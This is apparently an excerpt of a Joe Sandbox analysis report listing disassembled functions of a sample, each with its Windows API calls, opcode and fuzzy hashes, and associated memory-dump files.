Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 6806ae286e868659631dd60d8f02cf602a4f126e410cb50ebb5b4e1066d67439
Instruction ID: 92d6fb10604fb5cc45f2ec494990ae0a477f467e2c9ace59c7870b896d107b5f
Opcode Fuzzy Hash: 6806ae286e868659631dd60d8f02cf602a4f126e410cb50ebb5b4e1066d67439
Instruction Fuzzy Hash: 58E0D8B640034826DF03BB61DC06FEE7BAC6B05786F440891B640DF0B3EE78EA148B61

Function 0035081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00350836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0034F2D8,Crypt32.dll,00000000,0034F35C,?,?,0034F33E,?,?,?), ref: 00350858

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 9a0c006addaf349b00537f684fe1805e50e9fe93eb04b64d1c9acb209a289ae7
Instruction ID: 6bc5ba4590b9e0b50dbf86185b34637c5624c5c732c46036bc5144db0397a2df
Opcode Fuzzy Hash: 9a0c006addaf349b00537f684fe1805e50e9fe93eb04b64d1c9acb209a289ae7
Instruction Fuzzy Hash: 3FE048768001287BDB12AB94DC45FDA77ACEF093D2F040065BA49D6014D674DBC8CBB0

Function 0035A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0035A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0035A3E1

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 588ffeae2fdefda33934983b517e46ecc0737e68d9a2166a64aec2bf243da2b2
Instruction ID: f7473785f19ce7592fdd5c9f77ef164e71bcd4cbf779559863a76810c624ebb8
Opcode Fuzzy Hash: 588ffeae2fdefda33934983b517e46ecc0737e68d9a2166a64aec2bf243da2b2
Instruction Fuzzy Hash: BEE0ED75904218EBCB15DF59C541A99BBE8EB04366F10C05AE89697211E374AF08DB91

Function 00362B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00362BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00362BB5

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 0b5352b7fc807c69b2e07abb42e06ee8257a6828a80c59f28eb5463e083c1f85
Instruction ID: d786f0a77d6ed38b29db3136590bdb008b968c1aa856eaf2a5028d06bf8ede7b
Opcode Fuzzy Hash: 0b5352b7fc807c69b2e07abb42e06ee8257a6828a80c59f28eb5463e083c1f85
Instruction Fuzzy Hash: F1D02238154F00188C2BAEB428034CB3759ED42B76BA3C6CAF4209F8CDEF908080A011

Function 003412F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00341306
ShowWindow.USER32(00000000), ref: 0034130D

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 4a7ca99de4e7b0af0369c2f43afdc62ab7a287c7365d68d93f4509b4996c02e6
Instruction ID: f0862aef7664d32f6cb13dec2cf7b9edd164b7a796d00cbe1c6b014b79a45531
Opcode Fuzzy Hash: 4a7ca99de4e7b0af0369c2f43afdc62ab7a287c7365d68d93f4509b4996c02e6
Instruction Fuzzy Hash: D8C0123209C200BECB022BB4DC09C2BBBACABA6312F04C908B0A5C0060C33CC110DB11

Function 00341A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00341A09

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7bce6c7f23861ff96f0d5a2617266d0930f90ea3b3ed6e20d9febbb3624b76fa
Instruction ID: 4f2d3534134a539d946e1003fbdd2032699b718484894f969ea67cf4ccd659fa
Opcode Fuzzy Hash: 7bce6c7f23861ff96f0d5a2617266d0930f90ea3b3ed6e20d9febbb3624b76fa
Instruction Fuzzy Hash: 16C19470A00A549FEF16CF68C894BB97BE5EF16310F0905B9DC459F296DB30A9C4CB61

Function 00343BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00343BBF

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3f0321838ad845e2bb143512df33952128603cab1004851ace656a83491fe1bf
Instruction ID: a31d5bb6519d3ed40b7f2debcecd64fb4a120e1fbf9687dfbf420793a069030d
Opcode Fuzzy Hash: 3f0321838ad845e2bb143512df33952128603cab1004851ace656a83491fe1bf
Instruction Fuzzy Hash: 3F71D171501B849EDB26DF70C8919E7B7E9AF15301F40096EE5AB8F242DA327A88DF11

Function 00348284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00348289

Part of subcall function 003413DC: __EH_prolog.LIBCMT ref: 003413E1

Part of subcall function 0034A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0034A598

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 28a39b0e7016c279a4f97e916f5df825eab07f325594be05f0d5ea92a7bda952
Instruction ID: 4c72a0b5266e87cba50c7bdecd4cc4d0530dcf7c45fdfdd6179973b53aeaaed8
Opcode Fuzzy Hash: 28a39b0e7016c279a4f97e916f5df825eab07f325594be05f0d5ea92a7bda952
Instruction Fuzzy Hash: 9D41C5759446589ADB26DB60CC55AEEB3E8AF00304F0404EAE48A9F093EB757FC9CB10

Function 003413E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003413E1

Part of subcall function 00345E37: __EH_prolog.LIBCMT ref: 00345E3C

Part of subcall function 0034CE40: __EH_prolog.LIBCMT ref: 0034CE45

Part of subcall function 0034B505: __EH_prolog.LIBCMT ref: 0034B50A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 82ee9bc62f4d9d0e2d2a354464529f9f1849c5abb2a0b2b83dc7090493c71abd
Instruction ID: 2929638ea485dddef6eb325861d1170dffb0223aed4529494c7252c3affb3eb3
Opcode Fuzzy Hash: 82ee9bc62f4d9d0e2d2a354464529f9f1849c5abb2a0b2b83dc7090493c71abd
Instruction Fuzzy Hash: F94149B0905B409EE725DF398885AE6FBE5BF19310F50496ED5FE8B282CB317654CB10

Function 003413DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003413E1

Part of subcall function 00345E37: __EH_prolog.LIBCMT ref: 00345E3C

Part of subcall function 0034CE40: __EH_prolog.LIBCMT ref: 0034CE45

Part of subcall function 0034B505: __EH_prolog.LIBCMT ref: 0034B50A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d889b3575c13196f9df3dfe2c3bca808b7a0d68438559d282d4278d002ef7387
Instruction ID: 49778144cbc20d386ecf719c132f2e0b8fd437174c53a459b946d88c68089c97
Opcode Fuzzy Hash: d889b3575c13196f9df3dfe2c3bca808b7a0d68438559d282d4278d002ef7387
Instruction Fuzzy Hash: 244166B0905B409EE725DF398885AE7FBE5BF19300F50496ED5FE8B282CB316694CB10

Function 0035B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0035B098

Part of subcall function 003413DC: __EH_prolog.LIBCMT ref: 003413E1

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a33252336532081934c1b5b7e2fc45364d0908e99ede326b35887947575bbe49
Instruction ID: a261658b1ad234c95b0e79a31618e6dffe4d100ebce0b8ee4a07f673b7d1f3c2
Opcode Fuzzy Hash: a33252336532081934c1b5b7e2fc45364d0908e99ede326b35887947575bbe49
Instruction Fuzzy Hash: 5A317C75C046499ECF16DF64C8519EEBBB4AF09300F10449EE809BB252DB35AF08CBA1

Function 0036AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0036ACF8

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: fcba0e3abc6ec1f1dceb82dcbe34710c5a45834b9a3f92247e7196eafc281439
Instruction ID: 3455017dfb97536a57a5283e3dcb9aa4459c31b84a307da5fd1995c62f7b1ff5
Opcode Fuzzy Hash: fcba0e3abc6ec1f1dceb82dcbe34710c5a45834b9a3f92247e7196eafc281439
Instruction Fuzzy Hash: DB11E733A00A255FDB279E2CDC5085A7399AB85720B17C120ED15FB658D631DC418BD2

Function 00349215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0034921A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2e06f12a455f40f01cdb7abd1786c41c0c97a23aa9d6394e0469591e9f99a879
Instruction ID: 2432a4aa00e22df940446f2734e4394306366e9f0ae92330261c9d6d850aaf29
Opcode Fuzzy Hash: 2e06f12a455f40f01cdb7abd1786c41c0c97a23aa9d6394e0469591e9f99a879
Instruction Fuzzy Hash: 77016937900528ABCF13AF68CC81ADFB7B5BF88750F014555E815BF152DA74AD04C6A0

Function 0036C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0036B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00369813,00000001,00000364,?,00363F73,00000050,?,00381030,00000200), ref: 0036B177

_free.LIBCMT ref: 0036C4E5

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction ID: f65e3babc3220fb8e592fddf85479b0c9db541ec48494c55aec02c9e9df4c03b
Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction Fuzzy Hash: 1E0126722003056BE333CF66888196AFBECEB89370F26461DE1C487281EA30A805C734

Function 0036B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00369813,00000001,00000364,?,00363F73,00000050,?,00381030,00000200), ref: 0036B177

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 43763df379199886f9dfc8bbfb63db7dd945e12d18d78737c7d5b56b8c3a49d7
Instruction ID: e8d8a7e871885ee531df8fd21cea0854270bd2600051f7762b4b0f69b32765a2
Opcode Fuzzy Hash: 43763df379199886f9dfc8bbfb63db7dd945e12d18d78737c7d5b56b8c3a49d7
Instruction Fuzzy Hash: 7BF0543251512577DB335B65AC15B5FB75CAB43760B1AC211FC08DA198DB60D9818AE0

Function 00363C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00363C3F

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 89d1573b127eaeede77be388aa9287b8395318575f0dc4ecad4f2049fbe31dd5
Instruction ID: 8f589f97c662fed3a4fe13bc90ae7bf534ab7614510cd6898e37d354f90edf29
Opcode Fuzzy Hash: 89d1573b127eaeede77be388aa9287b8395318575f0dc4ecad4f2049fbe31dd5
Instruction Fuzzy Hash: 38F0A0322002169FCF138EA8EC0499A77ADEF01B307118124FA06E7194DB31DA20D7A0

Function 00368E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0036CA2C,00000000,?,00366CBE,?,00000008,?,003691E0,?,?,?), ref: 00368E38

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2e353545d7dafa8bb87ec193c8b5a00df18c0030b9f3702bf104c9e599f0df16
Instruction ID: 5316719766078f20dbcb5f5bf204801da7d446842af95052fbccc478b176b73b
Opcode Fuzzy Hash: 2e353545d7dafa8bb87ec193c8b5a00df18c0030b9f3702bf104c9e599f0df16
Instruction Fuzzy Hash: CDE06D3160622557EA732B659C05B9B7A4C9B4A7A4F16C322AC589A199CFA3CC0082F5

Function 00345ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00345AC2

Part of subcall function 0034B505: __EH_prolog.LIBCMT ref: 0034B50A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 161a577fb00d094b54bfff9f15454609d375bbcf90ee807cbbcd6e2fabf42fb5
Instruction ID: 540a50df5d6632460ae21e56d761fe610d38e929ab26b528d9b1af76222c43a9
Opcode Fuzzy Hash: 161a577fb00d094b54bfff9f15454609d375bbcf90ee807cbbcd6e2fabf42fb5
Instruction Fuzzy Hash: 69018C308106D0DAD72AE7B8C241BDDFBE4DF64305F50848DA85A5B283CBB52B08D7A3

Function 0034A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 0034A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0034A592,000000FF,?,?), ref: 0034A6C4
Part of subcall function 0034A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0034A592,000000FF,?,?), ref: 0034A6F2
Part of subcall function 0034A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0034A592,000000FF,?,?), ref: 0034A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0034A598

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: fb032a1217c94c257bff81d8673da5b4cb672774aa04b09a21dd34cddcf46046
Instruction ID: 405a3eb189444554bf7ef4763daa67037db2a0f914d7f11fc76cd3a00345597a
Opcode Fuzzy Hash: fb032a1217c94c257bff81d8673da5b4cb672774aa04b09a21dd34cddcf46046
